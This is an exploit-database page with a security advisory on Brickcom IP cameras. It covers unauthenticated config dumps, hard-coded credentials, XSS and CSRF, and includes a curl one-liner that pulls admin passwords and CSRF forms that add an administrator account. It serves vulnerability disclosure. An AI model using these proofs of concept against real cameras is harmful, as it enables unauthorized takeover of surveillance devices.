"Brickcom Corporation Network Cameras - Multiple Vulnerabilities"

Author

Exploit author

Orwelllabs

Platform

Exploit platform

hardware

Release date

Exploit published date

2016-04-14

                
                    
                         Download file
                    
                
            
_ _ _       _
                        | | | |     | |
  ___  _ ____      _____| | | | __ _| |__  ___
 / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | |   \ V  V /  __/ | | | (_| | |_) \__ \
 \___/|_|    \_/\_/ \___|_|_|_|\__,_|_.__/|___/


Security Adivisory
   2016-04-12
                www.orwelllabs.com
                  twt:@orwelllabs


                                   sm1thw@0rw3lll4bs:~/bb# ./Bruce.S
                                   [+] surveillance is the business model
of the internet - OK!
                                   sm1thw@0rw3lll4bs:~/bb# echo $?
                                   6079




Adivisory Information
=====================
Vendor: Brickcom Corporation
CVE-Number:N/A
Adivisory-URL:
http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html
OLSA-ID: OLSA-2015-12-12
Impact: High (especially because some of these products are used in
critical environments.)
Remote: Yes



          p4n0pt1c0n

I.   Insecure Direct Object Reference/Authentication Bypass
II.  Sensitive information in plaintext
III. Hard-coded Credentials
IV.  Cross-site scripting
V.   Basic Authentication
VI.  Cross-site Request Forgery




Background
----------
Brickcom (calls itself) as a "leading network video manufacturer in the IP
surveillance industry.
Dedicated to providing the best IP surveillance solutions with a solid
foundation for engineering
quality network video equipment with a Research and Development Department
that has been producing
wireless broadband networking equipment for over twenty years."

These products are used as video surveillance system by costumers and
important sectors such as the Thai 4ir F0rce, as can be seen on the
Vendor's web site.

* notes:

- some firmwares affected (item 'affected products' are very recent, having
been launched
a few months ago, and still vulnerable ... so this is an structural/legacy
problem.

- sensitive information presented in this advisory are fake.



I. Insecure Direct Object Reference/Authentication Bypass
---------------------------------------------------------
(+) affected scripts
- configfile.dump
      - syslog.dump


Path: Maintenance -> Configuration -> 'Export'

+ configfile.dump

An unauthenticated GET request to the script "configfile.dump", as follows:
   http://xxx.xxx.xxx.xxx/configfile.dump?action=get

or like this

   http://xxx.xxx.xxx.xxx/configfile.dump.backup
   http://xxx.xxx.xxx.xxx/configfile.dump.gz

or just
   http://xxx.xxx.xxx.xxx/configfile.dump

returns all camera settings

[..code_snip..]

   DeviceBasicInfo.firmwareVersion=v3.0.6.12
   DeviceBasicInfo.macAddress=00:00:00:00:00:00
   DeviceBasicInfo.sensorID=OV9X11
   DeviceBasicInfo.internalName=Brickcom
   DeviceBasicInfo.productName=Di-1092AX
   DeviceBasicInfo.displayName=CB-1092AX
   DeviceBasicInfo.modelNumber=XXX
   DeviceBasicInfo.companyName=Brickcom Corporation
   DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]
   DeviceBasicInfo.companyUrl=www.brickcom.com
   DeviceBasicInfo.serialNumber=AXNB02B211111
   DeviceBasicInfo.skuType=LIT
   DeviceBasicInfo.ledIndicatorMode=1
   DeviceBasicInfo.minorFW=1
   DeviceBasicInfo.hardwareVersion=
   DeviceBasicInfo.PseudoPDseProdNum=P3301
   AudioDeviceSetting.muted=0

[..code_snip..]

and all credentials including the administrator account, like this:


UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss   <<<--- admin pass
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User       <<<--- admin user
UserSetSetting.userList.users1.index=0
UserSetSetting.userList.users1.password=C0mm0mP4ss     <<<--- (commom) user
pass
UserSetSetting.userList.users1.privilege=1
UserSetSetting.userList.users1.username=User_name      <<<--- (commom)
username
UserSetSetting.userList.users2.index=0
UserSetSetting.userList.users2.password=[..code_snip..]
  [snip]
BasicNetworkSetting.pppoe.password=                   <<<--- ppoe user
BasicNetworkSetting.pppoe.username=                   <<<--- ppoe pass
UPnPSetting.enabled=1
UPnPSetting.name=CB-102Ap-1ffc3
Brickcom.enabled=1
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username=                         <<<--- dyndns user
DDNSSetting.dyndns.password=                         <<<--- dyndns password
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username=                         <<<--- and here...
DDNSSetting.tzodns.password=                         <<<--- here....
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username=                        <<<--- here
DDNSSetting.noipdns.password=                        <<<--- here
DDNSSetting.noipdns.hostname=
and many others...

- Path: System -> System Log -> 'Save to File'

+ syslog.dump

- Request:
(unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get

- Response:
[..code_snip..]

LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:13:36 2014
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:11:02 2014

[..code_snip..]


Proof of Concept
`````````````````
Online Bash exploit-p0c:
curl -s -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0"
configfile.dump|awk '{ FS="."; } { print $4; }' || echo -e "[-] The target
seems not be vulnerable, Mr. Robot! \n"

IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show a username,
password and privilege level (1:admin), like this:

password=4adm1niS3cr3tP4ss
privilege=1
username=BrickcomADMIN

and a configfile.dump with all credentials, settings, etc. will be recorded
locally.
IF not vulnerable, you'll see the message:

 "[-] The target seems not bet vulnerable, Mr. Robot!"


II. sensitive information in plaintext
--------------------------------------
As shown, there are countless cases where credentials and other sensitive
information are store in plaintext.


III. Hard-coded Credentials
---------------------------
All credentials and other sensitive information can be found in html page
user_management_config.html,
Just viewing the html source code:

view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html

<script type="text/javascript">
var Edit_id="";
var userSet_size="5"
var User_index=new Array(10);
var User_username=new Array(10);
var User_password=new Array(10);
var User_privilege=new Array(10);

User_index[0]="1";
User_username[0]="admin"; <<<----
User_password[0]="admin"; <<<----
User_privilege[0]="1";

User_index[1]="2";
User_username[1]="masteruser"; <<<----
User_password[1]="masterP4sss1*"; <<<----
User_privilege[1]="0";


IV. Cross-site scripting
------------------------
(+) Script: /cgi-bin/NotificationTest.cgi
(+) Param: action=


REQUEST: http://xxx.xxx.xxx.xxx/cgi-bin/NotificationTest.cgi?action=[ **
XSS
**]&addressType=&hostname=h0stn4mE&ipAddress=xxx.xxx.xxxx.xxx&ipv6Address=&portNo=&accountName=brickcom&password=brickcom&ShareDIR=


V. Basic Authentication
-----------------------
The response asks the user to enter credentials for Basic HTTP
authentication.
If these are supplied, they will be submitted over clear-text HTTP (in
Base64-encoded form).


V. Cross-site Request Forgery
-----------------------------
# To add an administrative credential: "brickcom:brickcom"

> Privilege levels:
- visor : 0
- admin : 1
- visor remoto : 2


<html>
  <!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
  <body>
    <form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="index" value="0" />
      <input type="hidden" name="username" value="brickcom" />
      <input type="hidden" name="password" value="brickcom" />
      <input type="hidden" name="privilege" value="1" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


# to remove this credential:

<html>
  <!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
  <body>
    <form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="username" value="brickcom" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


affected products
-----------------
(+) various products, including models:

  Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12
(release:09/08/2010 14:46)
  Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26
(release:01/21/2011 18:31)

  Vandal Dome Cameras
  -------------------
  Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise
(release:2015-10-01_18:46:07)
  Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T
(release:2016-03-21_10:08:24)
  Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T
(release:2015-06-25_11:18:07)

  Bullet Cameras
  --------------
  Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R
(release:2015-09-08_18:40:11)
  Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-16_11:36:46)
  Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-15_11:30:46)
  Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR
(release:2016-01-18_10:07:03)
  Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.17A (release: 2015-07-10_11:36:41)
  Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.18.3R (release: 2015-10-15_11:30:46)


  Mini Dome Camera
  ----------------
  Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8
(release:2013-08-01)


  Cube Camera
  -----------
  Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release:
09/07/2010 11:45)


  Fixed Dome Camera
  -----------------
  Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R
(release: 2015-08-19_18:47:31)


Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.


Timeline
++++++++
2015-03-20  - Issues discovered
2015-03-30  - attempt to contact Vendor
2015-12-12  - attempt to assign CVE
2016-04-12  - Not easy way to contact vendor, (ON Twitter) the last tweet
was 2011-01-31...
2016-04-14  - Full disclosure


About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in
embedded device & webapp hacking &&
aims to create some intelligence around this vast and confusing picture
that is the Internet of things.


-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-11-30	"Intelbras Router RF 301K 1.1.2 - Authentication Bypass"	webapps	hardware	"Kaio Amaral"
2020-11-30	"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure"	webapps	hardware	"Zagros Bingol"
2020-11-27	"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution"	webapps	hardware	"Emre SUREN"
2020-11-24	"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"	webapps	hardware	maj0rmil4d
2020-11-23	"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass"	webapps	hardware	malwrforensics
2020-11-19	"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification"	webapps	hardware	"Ricardo Longatto"
2020-11-19	"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure"	remote	hardware	"Nitesh Surana"
2020-11-16	"Cisco 7937G - DoS/Privilege Escalation"	remote	hardware	"Cody Martin"
2020-11-13	"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)"	webapps	hardware	b1ack0wl
2020-11-13	"Citrix ADC NetScaler - Local File Inclusion (Metasploit)"	webapps	hardware	"RAMELLA Sebastien"

Release Date	Title	Type	Platform	Author
2017-03-17	"AXIS (Multiple Products) - Cross-Site Request Forgery"	webapps	hardware	Orwelllabs
2017-03-17	"AXIS Communications - Cross-Site Scripting / Content Injection"	webapps	hardware	Orwelllabs
2016-07-29	"AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution"	webapps	linux	Orwelllabs
2016-05-10	"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-29	"Merit Lilin IP Cameras - Multiple Vulnerabilities"	webapps	cgi	Orwelllabs
2016-04-14	"Brickcom Corporation Network Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-11	"Axis Network Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-07	"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-04	"PQI Air Pen Express 6W51-0000R2/6W51-0000R2XXX - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2015-09-20	"ADH-Web Server IP-Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2015-09-02	"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass"	webapps	hardware	Orwelllabs

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Brickcom Corporation Network Cameras - Multiple Vulnerabilities"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.